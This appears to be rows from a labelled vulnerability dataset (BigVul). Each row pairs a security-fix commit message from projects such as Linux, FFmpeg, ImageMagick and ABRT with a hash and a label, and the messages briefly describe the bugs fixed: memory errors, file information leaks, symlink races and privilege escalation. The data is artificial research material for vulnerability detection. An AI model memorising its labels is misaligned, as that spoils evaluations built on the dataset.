Signed-off-by: Lv Zheng <[email protected]> | a23325b2e583556eae88ed3f764e457786bf4df6 | linux | bigvul | 1 | null | null | null |
avcodec/cdxl: Check format parameter
Fixes out of array access
Fixes: 1378/clusterfuzz-testcase-minimized-5715088008806400
Found-by: continuous fuzzing process https://github.com/google/oss-fuzz/tree/master/targets/ffmpeg
Signed-off-by: Michael Niedermayer <[email protected]> | e1b60aad77c27ed5d4dfc11e5e6a05a38c70489d | ffmpeg | bigvul | 1 | null | null | null |
avcodec/scpr: Fix multiple runtime error: index 256 out of bounds for type 'unsigned int [256]'
Fixes: 1519/clusterfuzz-testcase-minimized-5286680976162816
Found-by: continuous fuzzing process https://github.com/google/oss-fuzz/tree/master/targets/ffmpeg
Signed-off-by: Michael Niedermayer <[email protected]> | 2171dfae8c065878a2e130390eb78cf2947a5b69 | ffmpeg | bigvul | 1 | null | null | null |
avformat/hls: Check local file extensions
This reduces the attack surface of local file-system
information leaking.
It prevents the existing exploit leading to an information leak. As
well as similar hypothetical attacks.
Leaks of information from files and symlinks ending in common multimedia extensions
are still possible. But files with sensitive information like private keys and passwords
generally do not use common multimedia filename extensions.
It does not stop leaks via remote addresses in the LAN.
The existing exploit depends on a specific decoder as well.
It does appear though that the exploit should be possible with any decoder.
The problem is that as long as sensitive information gets into the decoder,
the output of the decoder becomes sensitive as well.
The only obvious solution is to prevent access to sensitive information. Or to
disable hls or possibly some of its feature. More complex solutions like
checking the path to limit access to only subdirectories of the hls path may
work as an alternative. But such solutions are fragile and tricky to implement
portably and would not stop every possible attack nor would they work with all
valid hls files.
Developers have expressed their dislike / objected to disabling hls by default as well
as disabling hls with local files. There also where objections against restricting
remote url file extensions. This here is a less robust but also lower
inconvenience solution.
It can be applied stand alone or together with other solutions.
limiting the check to local files was suggested by nevcairiel
This recommits the security fix without the author name joke which was
originally requested by Nicolas.
Found-by: Emil Lerner and Pavel Cheremushkin
Reported-by: Thierry Foucu <[email protected]>
Signed-off-by: Michael Niedermayer <[email protected]> | 189ff4219644532bdfa7bab28dfedaee4d6d4021 | ffmpeg | bigvul | 1 | null | null | null |
avcodec/dnxhd_parser: Do not return invalid value from dnxhd_find_frame_end() on error
Fixes: Null pointer dereference
Fixes: CVE-2017-9608
Found-by: Yihan Lian
Signed-off-by: Michael Niedermayer <[email protected]> | 611b35627488a8d0763e75c25ee0875c5b7987dd | ffmpeg | bigvul | 1 | null | null | null |
Do not allocate memory for zero length strings. (#1844)
Fixes #1821.
JerryScript-DCO-1.0-Signed-off-by: Zoltan Herczeg [email protected] | e58f2880df608652aff7fd35c45b242467ec0e79 | jerryscript | bigvul | 1 | null | null | null |
fix #55 : Byte value expressed in octal must be smaller than 256 | f015fbdd95f76438cd86366467bb2b39870dd7c6 | oniguruma | bigvul | 1 | null | null | null |
nfsd: encoders mustn't use unitialized values in error cases
In error cases, lgp->lg_layout_type may be out of bounds; so we
shouldn't be using it until after the check of nfserr.
This was seen to crash nfsd threads when the server receives a LAYOUTGET
request with a large layout type.
GETDEVICEINFO has the same problem.
Reported-by: Ari Kauppi <[email protected]>
Reviewed-by: Christoph Hellwig <[email protected]>
Cc: [email protected]
Signed-off-by: J. Bruce Fields <[email protected]> | f961e3f2acae94b727380c0b74e2d3954d0edf79 | linux | bigvul | 1 | null | null | null |
src/ : Move to a variable length header buffer
Previously, the `psf->header` buffer was a fixed length specified by
`SF_HEADER_LEN` which was set to `12292`. This was problematic for
two reasons; this value was un-necessarily large for the majority
of files and too small for some others.
Now the size of the header buffer starts at 256 bytes and grows as
necessary up to a maximum of 100k. | 708e996c87c5fae77b104ccfeb8f6db784c32074 | libsndfile | bigvul | 1 | null | null | null |
Backporting recursive handling of DefaultRoot path, when AllowChrootSymlinks
is off, to 1.3.5 branch. | ecff21e0d0e84f35c299ef91d7fda088e516d4ed | proftpd | bigvul | 1 | null | null | null |
Merge pull request #444 from proftpd/auth-symlinks-anywhere-in-chroot
Walk the entire DefaultRoot path, checking for symlinks of any compon… | f59593e6ff730b832dbe8754916cb5c821db579f | proftpd | bigvul | 1 | null | null | null |
tcp: mark skbs with SCM_TIMESTAMPING_OPT_STATS
SOF_TIMESTAMPING_OPT_STATS can be enabled and disabled
while packets are collected on the error queue.
So, checking SOF_TIMESTAMPING_OPT_STATS in sk->sk_tsflags
is not enough to safely assume that the skb contains
OPT_STATS data.
Add a bit in sock_exterr_skb to indicate whether the
skb contains opt_stats data.
Fixes: 1c885808e456 ("tcp: SOF_TIMESTAMPING_OPT_STATS option for SO_TIMESTAMPING")
Reported-by: JongHwan Kim <[email protected]>
Signed-off-by: Soheil Hassas Yeganeh <[email protected]>
Signed-off-by: Eric Dumazet <[email protected]>
Signed-off-by: Willem de Bruijn <[email protected]>
Signed-off-by: David S. Miller <[email protected]> | 4ef1b2869447411ad3ef91ad7d4891a83c1a509a | linux | bigvul | 1 | null | null | null |
xfrm_user: validate XFRM_MSG_NEWAE XFRMA_REPLAY_ESN_VAL replay_window
When a new xfrm state is created during an XFRM_MSG_NEWSA call we
validate the user supplied replay_esn to ensure that the size is valid
and to ensure that the replay_window size is within the allocated
buffer. However later it is possible to update this replay_esn via a
XFRM_MSG_NEWAE call. There we again validate the size of the supplied
buffer matches the existing state and if so inject the contents. We do
not at this point check that the replay_window is within the allocated
memory. This leads to out-of-bounds reads and writes triggered by
netlink packets. This leads to memory corruption and the potential for
priviledge escalation.
We already attempt to validate the incoming replay information in
xfrm_new_ae() via xfrm_replay_verify_len(). This confirms that the user
is not trying to change the size of the replay state buffer which
includes the replay_esn. It however does not check the replay_window
remains within that buffer. Add validation of the contained
replay_window.
CVE-2017-7184
Signed-off-by: Andy Whitcroft <[email protected]>
Acked-by: Steffen Klassert <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]> | 677e806da4d916052585301785d847c3b3e6186a | linux | bigvul | 1 | null | null | null |
Merge some file writing extension checks from OpenJK.
Thanks Ensiform.
https://github.com/JACoders/OpenJK/commit/05928a57f9e4aae15a3bd0
https://github.com/JACoders/OpenJK/commit/ef124fd0fc48af164581176 | b173ac05993f634a42be3d3535e1b158de0c3372 | openjk | bigvul | 1 | null | null | null |
Don't open .pk3 files as OpenAL drivers. | f61fe5f6a0419ef4a88d46a128052f2e8352e85d | openjk | bigvul | 1 | null | null | null |
All: Merge some file writing extension checks | 11a83410153756ae350a82ed41b08d128ff7f998 | openjk | bigvul | 1 | null | null | null |
All: Don't open .pk3 files as OpenAL drivers | b248763e4878ef12d5835ece6600be8334f67da1 | openjk | bigvul | 1 | null | null | null |
All: Don't load .pk3s as .dlls, and don't load user config files from .pk3s | b6ff2bcb1e4e6976d61e316175c6d7c99860fe20 | openjk | bigvul | 1 | null | null | null |
Don't load .pk3s as .dlls, and don't load user config files from .pk3s. | 376267d534476a875d8b9228149c4ee18b74a4fd | openjk | bigvul | 1 | null | null | null |
replace copy_file with copy_file_as_user | b8a4ff9775318ca5e679183884a6a63f3da8f863 | firejail | bigvul | 1 | null | null | null |
util-lib: use MODE_INVALID as invalid value for mode_t everywhere | ee735086f8670be1591fa9593e80dd60163a7a2f | systemd | bigvul | 1 | null | null | null |
fix #215 gdImageFillToBorder stack-overflow when invalid color is used | 77f619d48259383628c3ec4654b1ad578e9eb40e | php-src | bigvul | 1 | null | null | null |
Fix signature mismatch | 63346f34f9d19179599b5b256e5e8d3dda46435c | imagemagick | bigvul | 1 | null | null | null |
https://github.com/ImageMagick/ImageMagick/issues/110 | b5ed738f8060266bf4ae521f7e3ed145aa4498a3 | imagemagick | bigvul | 1 | null | null | null |
Fixed out-of-bounds write reported in: https://github.com/ImageMagick/ImageMagick/issues/102 | d9b2209a69ee90d8df81fb124eb66f593eb9f599 | imagemagick | bigvul | 1 | null | null | null |
Added check for bit depth 1. | 198fffab4daf8aea88badd9c629350e5b26ec32f | imagemagick | bigvul | 1 | null | null | null |
Rewrite reading pixel values. | 280215b9936d145dd5ee91403738ccce1333cab1 | imagemagick | bigvul | 1 | null | null | null |
Fixed overflow. | 6f1879d498bcc5cce12fe0c5decb8dbc0f608e5d | imagemagick | bigvul | 1 | null | null | null |
Fix OOB reads of the TGA decompression buffer
It is possible to craft TGA files which will overflow the decompression
buffer, but not the image's bitmap. Therefore we also have to check for
potential decompression buffer overflows.
This issue had been reported by Ibrahim El-Sayed to [email protected];
a modified case exposing an off-by-one error of the first patch had been
provided by Konrad Beckmann.
This commit is an amendment to commit fb0e0cce, so we use CVE-2016-6906
as well. | 58b6dde319c301b0eae27d12e2a659e067d80558 | libgd | bigvul | 1 | null | null | null |
http://www.imagemagick.org/discourse-server/viewtopic.php?f=3&t=26861 | 3ab016764c7f787829d9065440d86f5609765110 | imagemagick | bigvul | 1 | null | null | null |
http://www.imagemagick.org/discourse-server/viewtopic.php?f=3&t=26838 | 78f82d9d1c2944725a279acd573a22168dc6e22a | imagemagick | bigvul | 1 | null | null | null |
Fix scripts and code that use well-known tmp files. | c5759e7b76f5bf844be6c6641cc1b356bbc83869 | opa-ff | bigvul | 1 | null | null | null |
Move nfs.c:foreach_nfs_shareopt() to libshare.c:foreach_shareopt()
so that it can be (re)used in other parts of libshare. | 99aa4d2b4fd12c6bef62d02ffd1b375ddd42fcf4 | zfs | bigvul | 1 | null | null | null |
ccpp: do not read data from root directories
Users are allowed to modify /proc/[pid]/root to any directory by running
their own MOUNT namespace.
Related: #1211835
Signed-off-by: Jakub Filak <[email protected]> | 4f2c1ddd3e3b81d2d5146b883115371f1cada9f9 | abrt | bigvul | 1 | null | null | null |
ccpp: fix symlink race conditions
Fix copy & chown race conditions
Related: #1211835
Signed-off-by: Jakub Filak <[email protected]> | 80408e9e24a1c10f85fd969e1853e0f192157f92 | abrt | bigvul | 1 | null | null | null |
ccpp: open file for dump_fd_info with O_EXCL
To avoid possible races.
Related: #1211835
Signed-off-by: Jakub Filak <[email protected]> | d6e2f6f128cef4c21cb80941ae674c9842681aa7 | abrt | bigvul | 1 | null | null | null |
NetKVM: BZ#1169718: Checking the length only on read
Signed-off-by: Joseph Hindin <[email protected]> | 723416fa4210b7464b28eab89cc76252e6193ac1 | kvm-guest-drivers-windows | bigvul | 1 | null | null | null |
make the dump directories owned by root by default
It was discovered that the abrt event scripts create a user-readable
copy of a sosreport file in abrt problem directories, and include
excerpts of /var/log/messages selected by the user-controlled process
name, leading to an information disclosure.
This issue was discovered by Florian Weimer of Red Hat Product Security.
Related: #1212868
Signed-off-by: Jakub Filak <[email protected]> | 8939398b82006ba1fec4ed491339fc075f43fc7c | abrt | bigvul | 1 | null | null | null |
build: switch the default dump dir mode to 0640
The 0660 allows root escalations in ABRT. We don't really need to have
the dump directories writable for the group as ABRT processes run under
root. We introduced 0x1 for group with the switch to /var/tmp/abrt
because we thought that we will have ABRT processes run under the user
abrt, but there are no signs that we will ever pursue such a setup.
Related: #1212861
Signed-off-by: Jakub Filak <[email protected]> | c962918bc70a61a8cc647898ee8b1ff1c14a87c5 | abrt | bigvul | 1 | null | null | null |
Added check for bogus num_images value. | 504ada82b6fa38a30c846c1c29116af7290decb2 | imagemagick | bigvul | 1 | null | null | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.